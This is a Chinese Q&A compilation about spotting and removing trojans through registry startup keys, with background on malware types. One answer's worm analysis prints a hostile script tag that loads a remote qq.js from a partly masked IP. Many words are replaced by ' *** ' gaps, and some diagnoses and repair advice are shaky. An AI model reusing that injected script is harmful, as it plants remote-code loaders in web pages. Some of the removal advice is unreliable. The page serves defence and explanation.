文章大纲：

• 1、怎么判断注册表里的病毒和恶意代码？
• 2、如何清除注册表中的木马病毒?
• 3、请问这些代码是不是木马病毒？
• 4、注册表被木马修改怎么办
• 5、根据注册表启动项推断，发现以下可疑文件：c\windows\system32\ctfmon.exe怀疑是木马程序
• 6、急呀~！这些代码是那种木马病毒？

怎么判断注册表里的病毒和恶意代码？

不必要代码（Unwanted Code）是指没有作用却会带来危险的代码，一个最安全的定义是把所有不必要的代码都看作是恶意的，不必要代码比恶意代码具有更宽泛的含义，包括所有可能与某个组织安全策略相冲突的软件。

一、恶意代码的特征

恶意代码（Malicious code）或者叫恶意软件Malware（Malicious Software）具有如下共同特征：

（1） 恶意的目的

（2） 本身是程序

（3） 通过执行发生作用

有些恶作剧程序或者游戏程序不能看作是恶意代码。对滤过性病毒的特征进行讨论的文献很多，尽管它们数量很多，但是机理比较近似，在防病毒程序的防护范围之内，更值得注意的是非滤过性病毒。

二、非滤过性病毒

非过滤性病毒包括口令破解软件、嗅探器软件、键盘输入记录软件，远程特洛伊和谍件等等，组织内部或者外部的攻击者使用这些软件来获取口令、侦察 *** 通信、记录私人通信，暗地接收和传递远程主机的非授权命令，而有些私自安装的P2P软件实际上等于在企业的防火墙上开了一个口子。 非滤过性病毒有增长的趋势，对它的防御不是一个简单的任务。与非过滤性病毒病毒有关的概念包括：

（1）谍件

谍件（Spyware）与商业产品软件有关，有些商业软件产品在安装到用户机器上的时候，未经用户授权就通过Internet连接，让用户方软件与开发商软件进行通信，这部分通信软件就叫做谍件。用户只有安装了基于主机的防火墙，通过记录 *** 活动，才可能发现软件产品与其开发商在进行定期通讯。谍件作为商用软件包的一部分，多数是无害的，其目的多在于扫描系统，取得用户的私有数据。

（2）远程访问特洛伊

远程访问特洛伊RAT 是安装在受害者机器上，实现非授权的 *** 访问的程序，比如NetBus 和SubSeven 可以伪装成其他程序，迷惑用户安装，比如伪装成可以执行的电子邮件，或者Web下载文件，或者游戏和贺卡等，也可以通过物理接近的方式直接安装。

（3）Zombies

恶意代码不都是从内部进行控制的，在分布式拒绝服务攻击中，Internet的不少 站点受到其他主机上 zombies程序的攻击。zombies程序可以利用 *** 上计算机系统的安全漏洞将自动攻击脚本安装到多台主机上，这些主机成为受害者而听从攻击者指挥，在某个时刻，汇集到一起去再去攻击其他的受害者。

（4）破解和嗅探程序和 *** 漏洞扫描

口令破解、 *** 嗅探和 *** 漏洞扫描是公司内部人员侦察同事，取得非法的资源访问权限的主要手段，这些攻击工具不是自动执行， 而是被隐蔽地操纵。

（5）键盘记录程序

某些用户组织使用PC活动监视软件监视使用者的操作情况，通过键盘记录，防止雇员不适当的使用资源，或者收集罪犯的证据。这种软件也可以被攻击者用来进行信息刺探和 *** 攻击。

（6）P2P 系统.

基于Internet的点到点 （peer-to-peer）的应用程序比如 Napster、Gotomypc、AIM 和 Groove，以及远程访问工具通道像Gotomypc，这些程序都可以通过HTTP或者其他公共端口穿透防火墙，从而让雇员建立起自己的VPN，这种方式对于组织或者公司有时候是十分危险的。因为这些程序首先要从内部的PC 远程连接到外边的Gotomypc 主机，然后用户通过这个连接就可以访问办公室的PC。这种连接如果被利用，就会给组织或者企业带来很大的危害。

（7）逻辑炸弹和时间炸弹

逻辑炸弹和时间炸弹是以破坏数据和应用程序为目的的程序。一般是由组织内部有不满情绪的雇员植入， 逻辑炸弹和时间炸弹对于 *** 和系统有很大程度的破坏，Omega 工程公司的一个前 *** 管理员Timothy Lloyd，1996年引发了一个埋藏在原雇主计算机系统中的软件逻辑炸弹,导致了1千万美元的损失，而他本人最近也被判处41个月的监禁。

三、恶意代码的传播手法

恶意代码编写者一般利用三类手段来传播恶意代码：软件漏洞、用户本身或者两者的混合。有些恶意代码是自启动的蠕虫和嵌入脚本，本身就是软件，这类恶意代码对人的活动没有要求。一些像特洛伊木马、电子邮件蠕虫等恶意代码，利用受害者的心理操纵他们执行不安全的代码；还有一些是哄骗用户关闭保护措施来安装恶意代码。

利用商品软件缺陷的恶意代码有Code Red 、KaK 和BubbleBoy。它们完全依赖商业软件产品的缺陷和弱点，比如溢出漏洞和可以在不适当的环境中执行任意代码。像没有打补丁的IIS软件就有输入缓冲区溢出方面的缺陷。利用Web 服务缺陷的攻击代码有Code Red、Nimda，Linux 和Solaris上的蠕虫也利用了远程计算机的缺陷。

恶意代码编写者的一种典型手法是把恶意代码邮件伪装成其他恶意代码受害者的感染报警邮件，恶意代码受害者往往是Outlook地址簿中的用户或者是缓冲区中WEB页的用户，这样做可以更大可能的吸引受害者的注意力。一些恶意代码的作者还表现了高度的心理操纵能力，LoveLetter 就是一个突出的例子。一般用户对来自陌生人的邮件附件越来越警惕，而恶意代码的作者也设计一些诱饵吸引受害者的兴趣。附件的使用正在和必将受到网关过滤程序的限制和阻断，恶意代码的编写者也会设法绕过网关过滤程序的检查。使用的手法可能包括采用模糊的文件类型，将公共的执行文件类型压缩成zip文件等等。

对聊天室IRC（Internet Relay Chat）和即时消息IM(instant messaging)系统的攻击案例不断增加，其手法多为欺骗用户下载和执行自动的Agent软件，让远程系统用作分布式拒绝服务(DDoS)的攻击平台，或者使用后门程序和特洛伊木马程序控制之。

四、恶意代码传播的趋势

恶意代码的传播具有下面的趋势：

（1）种类更模糊

恶意代码的传播不单纯依赖软件漏洞或者社会工程中的某一种，而可能是它们的混合。比如蠕虫产生寄生的文件病毒，特洛伊程序，口令窃取程序，后门程序，进一步模糊了蠕虫、病毒和特洛伊的区别。

（2）混合传播模式

“混合病毒威胁”和“收敛（convergent）威胁”的成为新的病毒术语，“红色代码”利用的是IIS的漏洞，Nimda实际上是1988年出现的Morris 蠕虫的派生品种，它们的特点都是利用漏洞，病毒的模式从引导区方式发展为多种类病毒蠕虫方式，所需要的时间并不是很长。

（3）多平台

多平台攻击开始出现，有些恶意代码对不兼容的平台都能够有作用。来自Windows的蠕虫可以利用Apache的漏洞，而Linux蠕虫会派生exe格式的特洛伊。

（4） 使用销售技术

另外一个趋势是更多的恶意代码使用销售技术，其目的不仅在于利用受害者的邮箱实现更大数量的转发，更重要的是引起受害者的兴趣，让受害者进一步对恶意文件进行操作，并且使用 *** 探测、电子邮件脚本嵌入和其它不使用附件的技术来达到自己的目的。

恶意软件（malware）的制造者可能会将一些有名的攻击 *** 与新的漏洞结合起来，制造出下一代的WM/Concept, 下一代的Code Red, 下一代的 Nimda。对于防病毒软件的制造者，改变自己的 *** 去对付新的威胁则需要不少的时间。

（5）服务器和客户机同样遭受攻击

对于恶意代码来说服务器和客户机的区别越来越模糊，客户计算机和服务器如果运行同样的应用程序，也将会同样受到恶意代码的攻击。象IIS服务是一个操作系统缺省的服务，因此它的服务程序的缺陷是各个机器都共有的，Code Red的影响也就不限于服务器，还会影响到众多的个人计算机。

（6）Windows操作系统遭受的攻击最多

Windows操作系统更容易遭受恶意代码的攻击，它也是病毒攻击最集中的平台，病毒总是选择配置不好的 *** 共享和服务作为进入点。其它溢出问题，包括字符串格式和堆溢出，仍然是滤过性病毒入侵的基础。病毒和蠕虫的攻击点和附带功能都是由作者来选择的。另外一类缺陷是允许任意或者不适当的执行代码， 随着scriptlet.typelib 和Eyedog漏洞在聊天室的传播， *** /Kak利用IE/Outlook的漏洞，导致两个ActiveX控件在信任级别执行，但是它们仍然在用户不知道的情况下，执行非法代码。最近的一些漏洞帖子报告说Windows Media Player可以用来旁路Outlook 2002的安全设置，执行嵌入在HTML 邮件中的JavaScript 和 ActiveX代码。这种消息肯定会引发黑客的攻击热情。利用漏洞旁路一般的过滤 *** 是恶意代码采用的典型手法之一。

（7）恶意代码类型变化

此外，另外一类恶意代码是利用MIME边界和uuencode头的处理薄弱的缺陷，将恶意代码化装成安全数据类型，欺骗客户软件执行不适当的代码。

五、恶意代码相关的几个问题

（1）病毒防护没有标准的 *** ，专家认为比较安全的方式是每个星期更新一次病毒库，但是特殊情况下，需要更加频繁地更新。1999年Y2K 病毒库需要每天更新，而2000年五月，为了对付LoveLetter病毒的变种，一天就要几次更新病毒库。需要指出的是，有时候这种频繁的更新对于防护效果的提高很小。

（2）用户对于Microsoft的操作系统和应用程序抱怨很多，但是病毒防护工具本身的功能实在是应该被最多抱怨的一个因素。

（3）启发式的病毒搜索没有被广泛地使用，因为清除一个病毒比调整启发式软件的花费要小，而被比喻成“治疗比疾病本身更糟糕”。

（4）企业在防火墙管理，电子邮件管理上都花费了不小的精力，建议使用单独的人员和工具完成这个任务。

（5） 恶意代码攻击方面的数据分析做得很不够，尽管有些病毒扫描软件有系统活动日志，但是由于文件大小限制，不能长期保存。同时对于恶意代码感染程度的度量和分析做得也不够，一般的企业都不能从战术和战略两个层次清晰地描述自己公司的安全问题。

（6） 病毒扫描软件只是通知用户改变设置，而不是自动去修改设置。

（7） 病毒防护软件本身就有安全缺陷，容易被攻击者利用，只是由于害怕被攻击，病毒软件厂商不愿意谈及。

（8）许多的软件都是既可以用在安全管理，也可以用在安全突破上，问题在于意图，比如漏洞扫描程序和嗅探程序就可以被攻击者使用。

恶意代码的传播方式在迅速地演化，从引导区传播，到某种类型文件传播，到宏病毒传播，到邮件传播，到 *** 传播，发作和流行的时间越来越短。Form引导区病毒1989年出现，用了一年的时间流行起来，宏病毒 Concept Macro 1995年出现，用了三个月的时间流行， LoveLetter用了大约一天，而 Code Red用了大约90分钟， Nimda 用了不到 30分钟. 这些数字背后的规律是很显然的：在恶意代码演化的每个步骤，病毒和蠕虫从发布到流行的时间都越来越短。

恶意代码本身也越来越直接的利用操作系统或者应用程序的漏洞， 而不仅仅依赖社会工程。服务器和 *** 设施越来越多地成为攻击目标。L10n, PoisonBOx, Code Red 和 Nimda等蠕虫程序，利用漏洞来进行自我传播，不再需要搭乘其他代码

如何清除注册表中的木马病毒?

木马病毒的通用解法 由于很多新手对安全问题了解不多，所以并不知道自己的计算机中了“木马”该怎么样清除。虽然现在市面上有很多新版杀毒软件都可以自动清除“木马”，但它们并不能防范新出现的“木马”程序，因此最关键的还是要知道“木马”的工作原理，这样就会很容易发现“木马”。相信你看了这篇文章之后，就会成为一名查杀“木马”的高手了。 “木马”程序会想尽一切办法隐藏自己，主要途径有：在任务栏中隐藏自己，这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False，程序运行时就不会出现在任务栏中了。在任务管理器中隐形：将程序设为“系统服务”可以很轻松地伪装自己。 当然它也会悄无声息地启动，你当然不会指望用户每次启动后点击“木马”图标来运行服务端，，“木马”会在每次用户启动时自动装载服务端，Windows系统启动时自动加载应用程序的 *** ，“木马”都会用上，如：启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。下面具体谈谈“木马”是怎样自动加载的。 在win.ini文件中，在[WINDOWS]下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOL Trojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件。 在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe 程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。 在注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至：“HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记：有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v1.0木马”，它将注册表“HKEY－LOCAL－MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的 Explorer 键值改为Explorer=“C:\WINDOWS\expiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序，如：“HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY－USERS\＊＊＊＊\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能，更好的办法就是在“HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名，再在整个注册表中搜索即可。 知道了“木马”的工作原理，查杀“木马”就变得很容易，如果发现有“木马”存在，最安全也是最有效的 *** 就是马上将计算机与 *** 断开，防止黑客通过 *** 对你进行攻击。然后编辑win.ini文件，将[WINDOWS]下面，“run=“木马”程序”或“load=“木马”程序”更改为“run=”和“load=”；编辑system.ini文件，将[BOOT]下面的“shell=‘木马’文件”，更改为：“shell=explorer.exe”；在注册表中，用regedit对注册表进行编辑，先在“HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名，再在整个注册表中搜索并替换掉“木马”程序，有时候还需注意的是：有的“木马”程序并不是直接将“HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下的“木马”键值删除就行了，因为有的“木马”如：BladeRunner“木马”，如果你删除它，“木马”会立即自动加上，你需要的是记下“木马”的名字与目录，然后退回到MS－DOS下，找到此“木马”文件并删除掉。重新启动计算机，然后再到注册表中将所有“木马”文件的键值删除。至此，我们就大功告成了

请问这些代码是不是木马病毒？

这个代码属于木马病毒。

它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。 所谓隐蔽性是指木马的设计者为了防止木马被发现，会采用多种手段隐藏木马，这样服务端即使发现感染了木马，由于不能确定其具 *** 置，往往只能望“马”兴叹。 所谓非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。 从木马的发展来看，基本上可以分为两个阶段。 最初 *** 还处于以UNIX平台为主的时期，木马就产生了，当时的木马程序的功能相对简单，往往是将一段程序嵌入到系统文件中，用跳转指令来执行一些木马的功能，在这个时期木马的设计者和使用者大都是些技术人员，必须具备相当的 *** 和编程知识。 而后随着WINDOWS平台的日益普及，一些基于图形操作的木马程序出现了，用户界面的改善，使使用者不用懂太多的专业知识就可以熟练的操作木马，相对的木马入侵事件也频繁出现，而且由于这个时期木马的功能已日趋完善，因此对服务端的破坏也更大了。 所以所木马发展到今天，已经无所不用其极，一旦被木马控制，你的电脑将毫无秘密可言。 什么是木马 特洛伊木马(以下简称木马)，英文叫做“Trojan house”，其名称取自希腊神话的特洛伊木马记。 它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。

所谓隐蔽性是指木马的设计者为了防止木马被发现，会采用多种手段隐藏木马，这样服务端即使发现感染了木马，由于不能确定其具 *** 置，往往只能望“马”兴叹。 所谓非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。 从木马的发展来看，基本上可以分为两个阶段。

最初 *** 还处于以UNIX平台为主的时期，木马就产生了，当时的木马程序的功能相对简单，往往是将一段程序嵌入到系统文件中，用跳转指令来执行一些木马的功能，在这个时期木马的设计者和使用者大都是些技术人员，必须具备相当的 *** 和编程知识。 而后随着WINDOWS平台的日益普及，一些基于图形操作的木马程序出现了，用户界面的改善，使使用者不用懂太多的专业知识就可以熟练的操作木马，相对的木马入侵事件也频繁出现，而且由于这个时期木马的功能已日趋完善，因此对服务端的破坏也更大了。 所以所木马发展到今天，已经无所不用其极，一旦被木马控制，你的电脑将毫无秘密可言。

用杀毒软件可以清除木马。它不是一种对自己不利的“病毒”，能够应用和奴驾它的人，就将它看为是一种资源，它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。 一般自己中了木马病毒，首先要认清这是个什么病毒。其实 Trojan是某些防毒软件对后门木马的一种统称，它并不代表着固定的一个，而是一类，所以即使遇到同样名字的木马可能它们也并不相同。

希望我能帮助你解疑释惑。

注册表被木马修改怎么办

下面两种 *** 一是手动，一是用软件改，自己挑吧。

一、点 开始→运行→输入 regedit 后回车进入注册表编辑器

【记得新窗口中鼠标点到左上角的"我的电脑"上，以保证全盘搜索】

然后点击左上角的 "编辑"→查找→输入 08db.dll 后开始查找

找到后就将它删除,有多少删多少

最后重起机器即可.

这是软件删除不完全或是杀毒遗留,删了不影响电脑.

二、如果按我这 *** 都没有找到，就下个 【超级兔子】 清理一下。

到百度搜索“超级兔子 下载”，之一个网页是天空软件站的，就他吧

很好操作 很好用 很专业，修复IE，清除木马、流氓软件、IE插件等 功能很强大，

对了，还可以个性化自己的系统。

推荐

打开超级兔子以后点"打造属于自己的系统 → 启动程序 → 在里面找这个出错的DLL禁止掉

你去试试吧

根据注册表启动项推断，发现以下可疑文件：c\windows\system32\ctfmon.exe怀疑是木马程序

这是一个蠕虫病毒。（蠕虫病毒比以前少了很多，但对局域网的影响会很大）

该病毒运行后,会指定的 *** 上下载病毒程序,并且会搜索局域网内机器,以弱口令进行尝试性连接

一旦连接成功,则判断该机器弱口令是否有足够的权限, 有则向该远程机器发送恶意数据,然后利用windows漏洞来下载程序,予以执行.

1.病毒运行后，产生以下病毒文件

%WINDIR%\ SYSTEM32\tmipo.bat

%WINDIR%\ SYSTEM32\taimpo.txt

2.添加病毒启动项

启动项名:svchost对应路径:%Documents and Settings%\Administrator\桌面\ctfmon.exe

3.病毒会触发taimpo.bat病毒文件,用来关闭"360安全卫士",使用户的安全性能降低.

4.病毒会检测连接的远程机器,当远程机器的登录木马是弱口令时,则会对该机器进行攻击,最后下载adi.vbs到用户机器上.

5.遍历磁盘，查找*.htm、*.PHP、*.ASP等网页文件，开始感染,插入一段 *** 代码：

script language=javascript src=.**.**.248/qq.js

这段脚本病毒，可能会被用作下载更多的木马程序，利用蠕虫攻击传播，利用下载器种植木马，是目前黑客偷东西惯用的手法。

解决方案：

怕麻烦直接去下载专杀工具：

1.删除病毒生成的三个文件，可使用清理专家的文件粉碎器完成操作。

%WINDIR%\ SYSTEM32\tmipo.bat （%WINDIR%缺省是c:\windows目录）

%WINDIR%\ SYSTEM32\taimpo.txt

%Documents and Settings%\Administrator\桌面\ctfmon.exe（伪装成输入法的程序名）

2.使用金山清理专家的修复功能，将病毒添加的注册表启动项删除。

防范措施：

1.最最重要的，是给系统打补丁，登录系统一定要使用口令，就算是电脑只有自己一个人用，也需要安全的登录口令，口令不能太简单，以免被远程攻击工具猜解。（因为只要电脑接入互联网，就能给木马以机会.）

其它方案基本是相通的，不在缀述！

急呀~！这些代码是那种木马病毒？

1》troian.win32.inject.aemy

2》back door/win32.trojan

3》trojan/win32.superi

这些是病毒运行后，复制自身到系统目录下，衍生病毒文件，并删除自身。修改注册表，添加启动项，以达到随IEXPLORER.EXE进程的启动而启动的目的。helper.dll随IEXPLORER.EXE进程的启动而启动，进行劫持浏览器，键盘记录等相关病毒行为。主动连接 *** ，下载相关病毒文件信息。该病毒通过恶意网站、其它病毒/木马下载传播，可以盗取用户敏感信息。

用木马清道夫可以彻底清除！如果重装的话也可能在激活！因为它们产隐藏在C盘分区中，只有重新设置分区才行！用DOC工具箱来重新规划C盘分区！